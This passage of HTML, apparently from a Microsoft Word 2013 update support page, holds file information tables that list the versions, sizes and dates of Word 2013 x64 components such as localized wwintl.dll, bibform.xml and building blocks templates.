17</td><td>03:04</td></tr><tr><td>msword.olb</td><td>msword.olb</td><td>\u00a0</td><td>924832</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>winword.exe</td><td>winword.exe</td><td>15.0.4971.1002</td><td>1931944</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wrd12cnv.dll</td><td>wordcnv.dll</td><td>15.0.4971.1002</td><td>6334632</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wrd12pxy.cnv</td><td>wordcnvpxy.cnv</td><td>\u00a0</td><td>25168</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wrd12exe.exe</td><td>wordconv.exe</td><td>15.0.4454.1000</td><td>22096</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wwlib.dll</td><td>wwlib.dll</td><td>15.0.4971.1002</td><td>21823648</td><td>4-Oct-17</td><td>03:04</td></tr></tbody></table></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">For all supported x64-based versions of Word 2013</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p>\u00a0</p><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>calligra.dll</td><td>calligra.dll</td><td>15.0.4545.1000</td><td>328392</td><td>4-Oct-17</td><td>11:21</td></tr><tr><td>bibform.xml_1025</td><td>bibform.xml</td><td>\u00a0</td><td>106100</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_1025</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1068712</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1025</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1068712</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1025</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1068712</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1026</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1076904</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1026</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1076904</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1026</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1076904</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1029</td><td>bibform.xml</td><td>\u00a0</td><td>112512</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_1029</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1145000</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1029</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1145000</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1029</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1145000</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1030</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>985256</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1030</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>985256</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1030</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>985256</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1031</td><td>bibform.xml</td><td>\u00a0</td><td>114240</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_1031</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1073312</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1031</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1073312</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1031</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1073312</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1032</td><td>bibform.xml</td><td>\u00a0</td><td>114340</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_1032</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1211560</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1032</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1211560</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1032</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1211560</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_3082</td><td>bibform.xml</td><td>\u00a0</td><td>114930</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_3082</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1020584</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_3082</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1020584</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_3082</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1020584</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1061</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1001640</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1061</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1001640</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1061</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1001640</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1035</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1004704</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1035</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1004704</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1035</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1004704</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1036</td><td>bibform.xml</td><td>\u00a0</td><td>114844</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_1036</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1129128</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1036</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1129128</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1036</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1129128</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1037</td><td>bibform.xml</td><td>\u00a0</td><td>106424</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_1037</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1058984</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1037</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1058984</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1037</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1058984</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1081</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1046176</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1081</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1046176</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1081</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1046176</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1050</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1026728</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1050</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1026728</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1050</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1026728</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1038</td><td>bibform.xml</td><td>\u00a0</td><td>112560</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_1038</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1165472</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1038</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1165472</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1038</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1165472</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1057</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>946344</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1057</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>946344</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1057</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>946344</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1040</td><td>bibform.xml</td><td>\u00a0</td><td>112426</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_1040</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1027240</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1040</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1027240</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1040</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1027240</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1041</td><td>bibform.xml</td><td>\u00a0</td><td>97202</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>wac.word.wwintl.dll_1041</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1084072</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1041</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1084072</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1041</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1084072</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1087</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1104552</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1087</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1104552</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1087</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1104552</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1042</td><td>bibform.xml</td><td>\u00a0</td><td>97630</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>wac.word.wwintl.dll_1042</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1083560</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1042</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1083560</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1042</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1083560</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1063</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1085608</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1063</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1085608</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1063</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1085608</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1062</td><td>bibform.xml</td><td>\u00a0</td><td>114514</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>wac.word.wwintl.dll_1062</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1061544</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1062</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1061544</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1062</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1061544</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1086</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>949928</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1086</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>949928</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1086</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>949928</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1044</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>994472</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1044</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>994472</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1044</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>994472</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1043</td><td>bibform.xml</td><td>\u00a0</td><td>113208</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>wac.word.wwintl.dll_1043</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1011880</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1043</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1011880</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1043</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1011880</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1045</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1123496</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1045</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1123496</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1045</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1123496</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1046</td><td>bibform.xml</td><td>\u00a0</td><td>111828</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>wac.word.wwintl.dll_1046</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1029280</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1046</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1029280</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1046</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1029280</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_2070</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1042600</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_2070</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1042600</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_2070</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1042600</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1048</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1164456</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1048</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1164456</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1048</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1164456</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1049</td><td>bibform.xml</td><td>\u00a0</td><td>112712</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>wac.word.wwintl.dll_1049</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1049768</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1049</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1049768</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1049</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1049768</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1051</td><td>bibform.xml</td><td>\u00a0</td><td>111034</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>wac.word.wwintl.dll_1051</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1162920</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1051</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1162920</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1051</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1162920</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1060</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1050280</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1060</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1050280</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1060</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1050280</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_2074</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1083048</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_2074</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1083048</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_2074</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1083048</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1053</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>992424</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1053</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>992424</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1053</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>992424</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1054</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1012904</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1054</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1012904</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1054</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1012904</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1055</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1120416</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1055</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1120416</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1055</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1120416</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wac.word.wwintl.dll_1058</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1056424</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1058</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1056424</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1058</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1056424</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1066</td><td>bibform.xml</td><td>\u00a0</td><td>113620</td><td>4-Oct-17</td><td>11:21</td></tr><tr><td>wac.word.wwintl.dll_1066</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1152680</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1066</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1152680</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1066</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>1152680</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_2052</td><td>bibform.xml</td><td>\u00a0</td><td>96830</td><td>4-Oct-17</td><td>11:21</td></tr><tr><td>wac.word.wwintl.dll_2052</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>902816</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_2052</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>902816</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_2052</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>902816</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>bibform.xml_1028</td><td>bibform.xml</td><td>\u00a0</td><td>96804</td><td>4-Oct-17</td><td>11:21</td></tr><tr><td>wac.word.wwintl.dll_1028</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>916648</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1028</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>916648</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>wwintl.dll_1028</td><td>wwintl.dll</td><td>15.0.4971.1002</td><td>916648</td><td>4-Oct-17</td><td>10:41</td></tr><tr><td>document_parts.dot_1025</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3633666</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1026</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3637449</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1029</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3618985</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1030</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3608062</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1031</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3603386</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1032</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3653167</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_3082</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3612006</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1061</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604130</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1035</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3603428</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1036</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3619560</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1037</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3629591</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1081</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3644334</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1050</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3607442</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1038</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604785</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1057</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609041</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1040</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3599032</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1041</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3636899</td><td>4-Oct-17</td><td>11:19</td></tr><tr><td>document_parts.dot_1087</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3634700</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1042</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3628333</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1063</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3622044</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1062</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3611384</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1086</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604931</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1044</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3608018</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1043</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3601853</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1045</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609394</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1046</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617732</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_2070</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3613701</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1048</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617400</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1049</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3646588</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1051</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3613567</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1060</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3604721</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_2074</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3617809</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1053</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3609521</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1054</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3653990</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1055</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3607036</td><td>4-Oct-17</td><td>11:20</td></tr><tr><td>document_parts.dot_1058</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3649803</td><td>4-Oct-17</td><td>11:21</td></tr><tr><td>document_parts.dot_1066</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3631479</td><td>4-Oct-17</td><td>11:21</td></tr><tr><td>document_parts.dot_2052</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3615970</td><td>4-Oct-17</td><td>11:21</td></tr><tr><td>document_parts.dot_1028</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3627311</td><td>4-Oct-17</td><td>11:21</td></tr><tr><td>wordicon.exe</td><td>wordicon.exe</td><td>15.0.4553.1000</td><td>3015336</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>pdfreflow.exe</td><td>pdfreflow.exe</td><td>15.0.4971.1000</td><td>14038744</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wwintl.dll.idx_dll_1025</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1025</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>526016</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1026</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1026</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>533696</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1029</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.re